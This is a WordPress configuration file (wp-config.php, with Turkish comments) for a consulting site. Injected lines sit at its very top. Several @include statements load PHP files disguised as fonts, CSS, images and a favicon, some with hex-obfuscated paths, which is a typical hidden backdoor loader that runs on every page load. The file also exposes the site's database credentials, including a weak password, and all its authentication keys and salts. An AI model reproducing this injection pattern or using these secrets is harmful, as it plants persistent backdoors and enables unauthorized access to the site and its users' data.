@include_once('/home/hermesizmir/public_html/consulting/wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/css/status.logs.php'); @include_once('/home/hermesizmir/public_html/consulting/wp-content/plugins/revslider/public/assets/css/exceptions.clients.jpg'); @include_once('/home/hermesizmir/public_html/consulting/wp-content/plugins/revslider/public/assets/assets/501.400.php'); /*f64d5*/ @include "\x2fho\x6de/\x68er\x6des\x69zm\x69r/\x70ub\x6cic\x5fht\x6dl/\x65n/\x77p-\x69nc\x6cud\x65s/\x69ma\x67es\x2ffa\x76ic\x6fn_\x32e2\x6635\x2eic\x6f"; /*f64d5*/ ?> /*bf53e*/ @include "\x2fhom\x65/he\x72mes\x69zmi\x72/pu\x62lic\x5fhtm\x6c/en\x2fwp-\x69ncl\x75des\x2fima\x67es/\x66avi\x63on_\x32e2f\x335.i\x63o"; /*bf53e*/ /** * WordPress için taban ayar dosyası. * * Bu dosya şu ayarları içerir: MySQL ayarları, tablo öneki, * gizli anahtaralr ve ABSPATH. Daha fazla bilgi için * {@link https://codex.wordpress.org/Editing_wp-config.php wp-config.php düzenleme} * yardım sayfasına göz atabilirsiniz. MySQL ayarlarınızı servis sağlayıcınızdan edinebilirsiniz. * * Bu dosya kurulum sırasında wp-config.php dosyasının oluşturulabilmesi için * kullanılır. İsterseniz bu dosyayı kopyalayıp, ismini "wp-config.php" olarak değiştirip, * değerleri girerek de kullanabilirsiniz. * * @package WordPress */ // ** MySQL ayarları - Bu bilgileri sunucunuzdan alabilirsiniz ** // /** WordPress için kullanılacak veritabanının adı */ define('DB_NAME', 'en_danismanlik'); /** MySQL veritabanı kullanıcısı */ define('DB_USER', 'en_danismanlik'); /** MySQL veritabanı parolası */ define('DB_PASSWORD', 'q1w2e3r4'); /** MySQL sunucusu */ define('DB_HOST', 'localhost'); /** Yaratılacak tablolar için veritabanı karakter seti. */ define('DB_CHARSET', 'utf8mb4'); /** Veritabanı karşılaştırma tipi. Herhangi bir şüpheniz varsa bu değeri değiştirmeyin. */ define('DB_COLLATE', ''); /**#@+ * Eşsiz doğrulama anahtarları. * * Her anahtar farklı bir karakter kümesi olmalı! * {@link http://api.wordpress.org/secret-key/1.1/salt WordPress.org secret-key service} servisini kullanarak yaratabilirsiniz. * Çerezleri geçersiz kılmak için istediğiniz zaman bu değerleri değiştirebilirsiniz. Bu tüm kullanıcıların tekrar giriş yapmasını gerektirecektir. * * @since 2.6.0 */ define('AUTH_KEY', 'puTIwMSa^@VW[^$Zyvu+i~8(aW O/)E+{s5~F%hbP_#[~@s]_?z2:1P;-f[sC@`L'); define('SECURE_AUTH_KEY', ']3N)8Nu;i53GY2c0h.|R,J$q7-o8?b)Yr`gx3{DJZ3,'); define('LOGGED_IN_KEY', '=Kn1Q_K6d%y8iSAU=A/A`wUS6rS35ik?tR$.N-{Dym0L!`Uq+8A`Kpp@7UcWl+#T'); define('NONCE_KEY', '-QG8?AcP}a{CEUNR$^VD/c3 Q@[|kqyI?Qfv~{~kF?weHW6N w)~,?li]'); define('AUTH_SALT', '7Q^jtlqhY%oyg*|=#jrhI&zE1pi5,AZt}&;7F;uA:++}>*9[a|La9A-}k]4(j vv'); define('SECURE_AUTH_SALT', 'N-g5|Gt|5RZc%zoX~:l~7?0Yq>z2UuBlCsV9mlMOR/re]n@=iF!Qy%]P2BS+1?=o'); define('LOGGED_IN_SALT', 'E@6$_5bL-nO,%c>&f;PLvy(1JV~kNdC6l(:MwK`Dq%BRnh4FhskPJ-WHU43|#{H5'); define('NONCE_SALT', 'iwBxlE*,azDJ%5CYIR#,C8AmS`-R$p;9wzOsX}~TcNIIL+K, YUJ;{lMv2]D>w:u'); /**#@-*/ /** * WordPress veritabanı tablo ön eki. * * Tüm kurulumlara ayrı bir önek vererek bir veritabanına birden fazla kurulum yapabilirsiniz. * Sadece rakamlar, harfler ve alt çizgi lütfen. */ $table_prefix = 'wp_'; /** * Geliştiriciler için: WordPress hata ayıklama modu. * * Bu değeri "true" yaparak geliştirme sırasında hataların ekrana basılmasını sağlayabilirsiniz. * Tema ve eklenti geliştiricilerinin geliştirme aşamasında WP_DEBUG * kullanmalarını önemle tavsiye ederiz. */ define('WP_DEBUG', false); /* Hepsi bu kadar. Mutlu bloglamalar! */ /** WordPress dizini için mutlak yol. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** WordPress değişkenlerini ve yollarını kurar. */ require_once(ABSPATH . 'wp-settings.php');